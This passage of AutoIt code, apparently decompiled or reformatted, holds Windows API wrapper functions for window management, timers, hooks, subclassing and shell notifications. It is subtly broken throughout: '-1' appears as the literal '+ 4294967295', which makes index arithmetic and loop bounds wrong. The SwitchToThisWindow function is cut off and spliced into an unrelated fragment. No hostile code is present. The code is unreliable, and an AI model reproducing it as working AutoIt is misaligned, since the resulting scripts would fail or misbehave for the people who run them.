ENDFUNC FUNC _WINAPI_GETFOREGROUNDWINDOW () LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetForegroundWindow" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETGUITHREADINFO ($ITHREADID ) LOCAL CONST $TAGGUITHREADINFO = "dword Size;dword Flags;hwnd hWndActive;hwnd hWndFocus;hwnd hWndCapture;hwnd hWndMenuOwner;hwnd hWndMoveSize;hwnd hWndCaret;struct rcCaret;long left;long top;long right;long bottom;endstruct" LOCAL $TGTI = DLLSTRUCTCREATE ($TAGGUITHREADINFO ) DLLSTRUCTSETDATA ($TGTI , 1 , DLLSTRUCTGETSIZE ($TGTI ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetGUIThreadInfo" , "dword" , $ITHREADID , "struct*" , $TGTI ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [11 ] FOR $I = 0 TO 10 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TGTI , $I + 2 ) NEXT FOR $I = 9 TO 10 $ARESULT [$I ] -= $ARESULT [$I + 4294967294 ] NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETLASTACTIVEPOPUP ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , 
"GetLastActivePopup" , "hwnd" , $HWND ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) IF $ARET [0 ] = $HWND THEN RETURN SETERROR (1 , 0 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETLAYEREDWINDOWATTRIBUTES ($HWND , BYREF $ITRANSCOLOR , BYREF $ITRANSGUI , $BCOLORREF = FALSE ) $ITRANSCOLOR = + 4294967295 $ITRANSGUI = + 4294967295 LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "GetLayeredWindowAttributes" , "hwnd" , $HWND , "INT*" , $ITRANSCOLOR , "byte*" , $ITRANSGUI , "dword*" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $BCOLORREF THEN $ARESULT [2 ] = INT (BINARYMID ($ARESULT [2 ] , 3 , 1 ) & BINARYMID ($ARESULT [2 ] , 2 , 1 ) & BINARYMID ($ARESULT [2 ] , 1 , 1 ) ) ENDIF $ITRANSCOLOR = $ARESULT [2 ] $ITRANSGUI = $ARESULT [3 ] RETURN $ARESULT [4 ] ENDFUNC FUNC _WINAPI_GETMESSAGEEXTRAINFO () LOCAL $ARET = DLLCALL ("user32.dll" , "lparam" , "GetMessageExtraInfo" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSHELLWINDOW () LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "GetShellWindow" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETTOPWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "GetTopWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETWINDOWDISPLAYAFFINITY ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowDisplayAffinity" , "hwnd" , $HWND , "dword*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_GETWINDOWINFO ($HWND ) LOCAL $TWINDOWINFO = DLLSTRUCTCREATE ($TAGWINDOWINFO ) DLLSTRUCTSETDATA ($TWINDOWINFO , "Size" , DLLSTRUCTGETSIZE ($TWINDOWINFO ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowInfo" , "hwnd" , $HWND , "struct*" , $TWINDOWINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN 
SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TWINDOWINFO ENDFUNC FUNC _WINAPI_GETWINDOWPLACEMENT ($HWND ) LOCAL $TWINDOWPLACEMENT = DLLSTRUCTCREATE ($TAGWINDOWPLACEMENT ) DLLSTRUCTSETDATA ($TWINDOWPLACEMENT , "length" , DLLSTRUCTGETSIZE ($TWINDOWPLACEMENT ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowPlacement" , "hwnd" , $HWND , "struct*" , $TWINDOWPLACEMENT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TWINDOWPLACEMENT ENDFUNC FUNC _WINAPI_ISCHILD ($HWND , $HWNDPARENT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsChild" , "hwnd" , $HWNDPARENT , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISHUNGAPPWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsHungAppWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISICONIC ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsIconic" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISWINDOWUNICODE ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsWindowUnicode" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISZOOMED ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsZoomed" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_KILLTIMER ($HWND , $ITIMERID ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "KillTimer" , "hwnd" , $HWND , "uint_ptr" , $ITIMERID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_OPENICON ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "OpenIcon" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_POSTMESSAGE ($HWND , $IMSG , 
$WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "PostMessage" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_REGISTERCLASS ($TWNDCLASS ) LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "RegisterClassW" , "struct*" , $TWNDCLASS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERCLASSEX ($TWNDCLASSEX ) LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "RegisterClassExW" , "struct*" , $TWNDCLASSEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERSHELLHOOKWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "RegisterShellHookWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERWINDOWMESSAGE ($SMESSAGE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "uint" , "RegisterWindowMessageW" , "wstr" , $SMESSAGE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SENDMESSAGETIMEOUT ($HWND , $IMSG , $WPARAM = 0 , $LPARAM = 0 , $ITIMEOUT = 1000 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "SendMessageTimeoutW" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM , "uint" , $IFLAGS , "uint" , $ITIMEOUT , "dword_ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_GETLASTERROR () , + 4294967295 ) RETURN $ARET [7 ] ENDFUNC FUNC _WINAPI_SETCLASSLONGEX ($HWND , $IINDEX , $INEWLONG ) LOCAL $ARET IF @AUTOITX64 THEN $ARET = DLLCALL ("user32.dll" , "ulong_ptr" , "SetClassLongPtrW" , "hwnd" , $HWND , "int" , $IINDEX , "long_ptr" , $INEWLONG ) ELSE $ARET = DLLCALL ("user32.dll" , "dword" , "SetClassLongW" , "hwnd" , $HWND , "int" , $IINDEX , "long" , $INEWLONG ) ENDIF IF @ERROR 
THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETFOREGROUNDWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SetForegroundWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETLAYEREDWINDOWATTRIBUTES ($HWND , $ITRANSCOLOR , $ITRANSGUI = 255 , $IFLAGS = 3 , $BCOLORREF = FALSE ) IF $IFLAGS = DEFAULT OR $IFLAGS = "" OR $IFLAGS < 0 THEN $IFLAGS = 3 IF NOT $BCOLORREF THEN $ITRANSCOLOR = INT (BINARYMID ($ITRANSCOLOR , 3 , 1 ) & BINARYMID ($ITRANSCOLOR , 2 , 1 ) & BINARYMID ($ITRANSCOLOR , 1 , 1 ) ) ENDIF LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetLayeredWindowAttributes" , "hwnd" , $HWND , "INT" , $ITRANSCOLOR , "byte" , $ITRANSGUI , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETMESSAGEEXTRAINFO ($LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "lparam" , "SetMessageExtraInfo" , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETSYSCOLORS ($VELEMENTS , $VCOLORS ) LOCAL $BISEARRAY = ISARRAY ($VELEMENTS ) , $BISCARRAY = ISARRAY ($VCOLORS ) LOCAL $IELEMENTNUM IF NOT $BISCARRAY AND NOT $BISEARRAY THEN $IELEMENTNUM = 1 ELSEIF $BISCARRAY OR $BISEARRAY THEN IF NOT $BISCARRAY OR NOT $BISEARRAY THEN RETURN SETERROR (+ 4294967295 , + 4294967295 , FALSE ) IF UBOUND ($VELEMENTS ) <> UBOUND ($VCOLORS ) THEN RETURN SETERROR (+ 4294967295 , + 4294967295 , FALSE ) $IELEMENTNUM = UBOUND ($VELEMENTS ) ENDIF LOCAL $TELEMENTS = DLLSTRUCTCREATE ("int Element[" & $IELEMENTNUM & "]" ) LOCAL $TCOLORS = DLLSTRUCTCREATE ("INT NewColor[" & $IELEMENTNUM & "]" ) IF NOT $BISEARRAY THEN DLLSTRUCTSETDATA ($TELEMENTS , "Element" , $VELEMENTS , 1 ) ELSE FOR $X = 0 TO $IELEMENTNUM + 4294967295 DLLSTRUCTSETDATA ($TELEMENTS , "Element" , $VELEMENTS [$X ] , $X + 1 ) NEXT ENDIF IF NOT $BISCARRAY THEN DLLSTRUCTSETDATA 
($TCOLORS , "NewColor" , $VCOLORS , 1 ) ELSE FOR $X = 0 TO $IELEMENTNUM + 4294967295 DLLSTRUCTSETDATA ($TCOLORS , "NewColor" , $VCOLORS [$X ] , $X + 1 ) NEXT ENDIF LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetSysColors" , "int" , $IELEMENTNUM , "struct*" , $TELEMENTS , "struct*" , $TCOLORS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETTIMER ($HWND , $ITIMERID , $IELAPSE , $PTIMERFUNC ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint_ptr" , "SetTimer" , "hwnd" , $HWND , "uint_ptr" , $ITIMERID , "uint" , $IELAPSE , "ptr" , $PTIMERFUNC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWDISPLAYAFFINITY ($HWND , $IAFFINITY ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SetWindowDisplayAffinity" , "hwnd" , $HWND , "dword" , $IAFFINITY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWLONG ($HWND , $IINDEX , $IVALUE ) _WINAPI_SETLASTERROR (0 ) LOCAL $SFUNCNAME = "SetWindowLongW" IF @AUTOITX64 THEN $SFUNCNAME = "SetWindowLongPtrW" LOCAL $ARESULT = DLLCALL ("user32.dll" , "long_ptr" , $SFUNCNAME , "hwnd" , $HWND , "int" , $IINDEX , "long_ptr" , $IVALUE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWPLACEMENT ($HWND , $TWINDOWPLACEMENT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetWindowPlacement" , "hwnd" , $HWND , "struct*" , $TWINDOWPLACEMENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SHOWOWNEDPOPUPS ($HWND , $BSHOW ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ShowOwnedPopups" , "hwnd" , $HWND , "bool" , $BSHOW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SWITCHTOTHISWINDOW ($HWND , $BALTTAB = FALSE ) DLLCALL ("user32.dll" , "none" , "SwitchToThisWindow" , "hwnd" , $HWND , "bool" , $BALTTAB ) IF 
OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SWITCHDESKTOP ($HDESKTOP ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SwitchDesktop" , "handle" , $HDESKTOP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SYSTEMPARAMETERSINFO ($IACTION , $IPARAM = 0 , $VPARAM = 0 , $IWININI = 0 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SystemParametersInfoW" , "uint" , $IACTION , "uint" , $IPARAM , "struct*" , $VPARAM , "uint" , $IWININI ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_TRACKMOUSEEVENT ($HWND , $IFLAGS , $ITIME = + 4294967295 ) LOCAL $TTME = DLLSTRUCTCREATE ("dword;dword;hwnd;dword" ) DLLSTRUCTSETDATA ($TTME , 1 , DLLSTRUCTGETSIZE ($TTME ) ) DLLSTRUCTSETDATA ($TTME , 2 , $IFLAGS ) DLLSTRUCTSETDATA ($TTME , 3 , $HWND ) DLLSTRUCTSETDATA ($TTME , 4 , $ITIME ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "TrackMouseEvent" , "struct*" , $TTME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNHOOKWINDOWSHOOKEX ($HHOOK ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "UnhookWindowsHookEx" , "handle" , $HHOOK ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_UNHOOKWINEVENT ($HEVENTHOOK ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnhookWinEvent" , "handle" , $HEVENTHOOK ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNLOADKEYBOARDLAYOUT ($HLOCALE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnloadKeyboardLayout" , "handle" , $HLOCALE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNREGISTERHOTKEY ($HWND , $IID ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnregisterHotKey" , "hwnd" , $HWND , "int" , $IID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) 
RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNREGISTERPOWERSETTINGNOTIFICATION ($HNOTIFY ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnregisterPowerSettingNotification" , "handle" , $HNOTIFY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC __ENUMPAGEFILESPROC ($ISIZE , $PINFO , $PFILE ) LOCAL $TEPFI = DLLSTRUCTCREATE ("dword;dword;ulong_ptr;ulong_ptr;ulong_ptr" , $PINFO ) __INC ($__G_VENUM ) $__G_VENUM [$__G_VENUM [0 ] [0 ] ] [0 ] = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & (_WINAPI_STRLEN ($PFILE ) + 1 ) & "]" , $PFILE ) , 1 ) FOR $I = 1 TO 3 $__G_VENUM [$__G_VENUM [0 ] [0 ] ] [$I ] = DLLSTRUCTGETDATA ($TEPFI , $I + 2 ) * $ISIZE NEXT RETURN 1 ENDFUNC #EndRegion Internal Functions #Region Global Variables and Constants GLOBAL CONST $TAGNOTIFYICONDATA = "struct;dword Size;hwnd hWnd;uint ID;uint Flags;uint CallbackMessage;ptr hIcon;wchar Tip[128];dword State;dword StateMask;wchar Info[256];uint Version;wchar InfoTitle[64];dword InfoFlags;endstruct" GLOBAL CONST $TAGNOTIFYICONDATA_V3 = $TAGNOTIFYICONDATA & ";" & $TAGGUID GLOBAL CONST $TAGNOTIFYICONDATA_V4 = $TAGNOTIFYICONDATA_V3 & ";ptr hBalloonIcon;" GLOBAL CONST $TAGSHELLEXECUTEINFO = "dword Size;ulong Mask;hwnd hWnd;ptr Verb;ptr File;ptr Parameters;ptr Directory;int Show;ulong_ptr hInstApp;ptr IDList;ptr Class;ulong_ptr hKeyClass;dword HotKey;ptr hMonitor;ptr hProcess" GLOBAL CONST $TAGSHFILEINFO = "ptr hIcon;int iIcon;dword Attributes;wchar DisplayName[260];wchar TypeName[80]" GLOBAL CONST $TAGSHFILEOPSTRUCT = "hwnd hWnd;uint Func;ptr From;ptr To;dword Flags;int fAnyOperationsAborted;ptr hNameMappings;ptr ProgressTitle" GLOBAL CONST $TAGSHFOLDERCUSTOMSETTINGS = "dword Size;dword Mask;ptr GUID;ptr WebViewTemplate;dword SizeWVT;ptr WebViewTemplateVersion;ptr InfoTip;dword SizeIT;ptr CLSID;dword Flags;ptr IconFile;dword SizeIF;int IconIndex;ptr Logo;dword SizeL" GLOBAL CONST $TAGSHSTOCKICONINFO = "dword Size;ptr hIcon;int SysImageIndex;int iIcon;wchar Path[260]" 
#EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_DEFSUBCLASSPROC ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "lresult" , "DefSubclassProc" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DLLGETVERSION ($SFILEPATH ) LOCAL $TVERSION = DLLSTRUCTCREATE ("dword[5]" ) DLLSTRUCTSETDATA ($TVERSION , 1 , DLLSTRUCTGETSIZE ($TVERSION ) , 1 ) LOCAL $ARET = DLLCALL ($SFILEPATH , "uint" , "DllGetVersion" , "struct*" , $TVERSION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [4 ] FOR $I = 0 TO 3 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TVERSION , 1 , $I + 2 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_FINDEXECUTABLE ($SFILENAME , $SDIRECTORY = "" ) LOCAL $ARESULT = DLLCALL ("shell32.dll" , "INT" , "FindExecutableW" , "wstr" , $SFILENAME , "wstr" , $SDIRECTORY , "wstr" , "" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARESULT [0 ] <= 32 THEN RETURN SETERROR (10 , $ARESULT [0 ] , "" ) RETURN SETEXTENDED ($ARESULT [0 ] , $ARESULT [3 ] ) ENDFUNC FUNC _WINAPI_GETALLUSERSPROFILEDIRECTORY () LOCAL $ARET = DLLCALL ("userenv.dll" , "bool" , "GetAllUsersProfileDirectoryW" , "wstr" , "" , "dword*" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETDEFAULTUSERPROFILEDIRECTORY () LOCAL $ARET = DLLCALL ("userenv.dll" , "bool" , "GetDefaultUserProfileDirectoryW" , "wstr" , "" , "dword*" , 4096 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETWINDOWSUBCLASS ($HWND , $PSUBCLASSPROC , $IDSUBCLASS ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "bool" , "GetWindowSubclass" , "hwnd" , $HWND , "ptr" , $PSUBCLASSPROC , "uint_ptr" , $IDSUBCLASS , 
"dword_ptr*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [4 ] ENDFUNC FUNC _WINAPI_REMOVEWINDOWSUBCLASS ($HWND , $PSUBCLASSPROC , $IDSUBCLASS ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "bool" , "RemoveWindowSubclass" , "hwnd" , $HWND , "ptr" , $PSUBCLASSPROC , "uint_ptr" , $IDSUBCLASS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETCURRENTPROCESSEXPLICITAPPUSERMODELID ($SAPPID ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SetCurrentProcessExplicitAppUserModelID" , "wstr" , $SAPPID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SETWINDOWSUBCLASS ($HWND , $PSUBCLASSPROC , $IDSUBCLASS , $PDATA = 0 ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "bool" , "SetWindowSubclass" , "hwnd" , $HWND , "ptr" , $PSUBCLASSPROC , "uint_ptr" , $IDSUBCLASS , "dword_ptr" , $PDATA ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLADDTORECENTDOCS ($SFILEPATH ) LOCAL $STYPEOFFILE = "wstr" IF STRINGSTRIPWS ($SFILEPATH , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $SFILEPATH = _WINAPI_PATHSEARCHANDQUALIFY ($SFILEPATH , 1 ) IF NOT $SFILEPATH THEN RETURN SETERROR (1 , 0 , 0 ) ENDIF ELSE $STYPEOFFILE = "ptr" $SFILEPATH = 0 ENDIF DLLCALL ("shell32.dll" , "none" , "SHAddToRecentDocs" , "uint" , 3 , $STYPEOFFILE , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLCHANGENOTIFY ($IEVENT , $IFLAGS , $IITEM1 = 0 , $IITEM2 = 0 ) LOCAL $STYPEOFITEM1 = "dword_ptr" , $STYPEOFITEM2 = "dword_ptr" IF ISSTRING ($IITEM1 ) THEN $STYPEOFITEM1 = "wstr" ENDIF IF ISSTRING ($IITEM2 ) THEN $STYPEOFITEM2 = "wstr" ENDIF DLLCALL ("shell32.dll" , "none" , "SHChangeNotify" , "long" , $IEVENT , "uint" , $IFLAGS , $STYPEOFITEM1 , $IITEM1 , $STYPEOFITEM2 , $IITEM2 ) IF @ERROR THEN RETURN SETERROR (@ERROR , 
@EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLCHANGENOTIFYDEREGISTER ($IID ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHChangeNotifyDeregister" , "ulong" , $IID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLCHANGENOTIFYREGISTER ($HWND , $IMSG , $IEVENTS , $ISOURCES , $APATHS , $BRECURSIVE = FALSE ) LOCAL $IPATH = $APATHS , $TAGSTRUCT = "" IF ISARRAY ($APATHS ) THEN IF UBOUND ($APATHS , $UBOUND_COLUMNS ) THEN RETURN SETERROR (1 , 0 , 0 ) ELSE DIM $APATHS [1 ] = [$IPATH ] ENDIF FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 IF NOT _WINAPI_PATHISDIRECTORY ($APATHS [$I ] ) THEN RETURN SETERROR (2 , 0 , 0 ) NEXT FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 $TAGSTRUCT &= "ptr;int;" NEXT LOCAL $TENTRY = DLLSTRUCTCREATE ($TAGSTRUCT ) FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 $APATHS [$I ] = _WINAPI_SHELLILCREATEFROMPATH (_WINAPI_PATHSEARCHANDQUALIFY ($APATHS [$I ] ) ) DLLSTRUCTSETDATA ($TENTRY , 2 * $I + 1 , $APATHS [$I ] ) DLLSTRUCTSETDATA ($TENTRY , 2 * $I + 2 , $BRECURSIVE ) NEXT LOCAL $IERROR = 0 LOCAL $ARET = DLLCALL ("shell32.dll" , "ulong" , "SHChangeNotifyRegister" , "hwnd" , $HWND , "int" , $ISOURCES , "long" , $IEVENTS , "uint" , $IMSG , "int" , UBOUND ($APATHS ) , "struct*" , $TENTRY ) IF @ERROR OR NOT $ARET [0 ] THEN $IERROR = @ERROR + 10 FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 _WINAPI_COTASKMEMFREE ($APATHS [$I ] ) NEXT RETURN SETERROR ($IERROR , 0 , $ARET [0 ] ) ENDFUNC FUNC _WINAPI_SHELLCREATEDIRECTORY ($SFILEPATH , $HPARENT = 0 , $TSECURITY = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHCreateDirectoryExW" , "hwnd" , $HPARENT , "wstr" , $SFILEPATH , "struct*" , $TSECURITY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLEMPTYRECYCLEBIN ($SROOT = "" , $IFLAGS = 0 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHEmptyRecycleBinW" , "hwnd" , $HPARENT , 
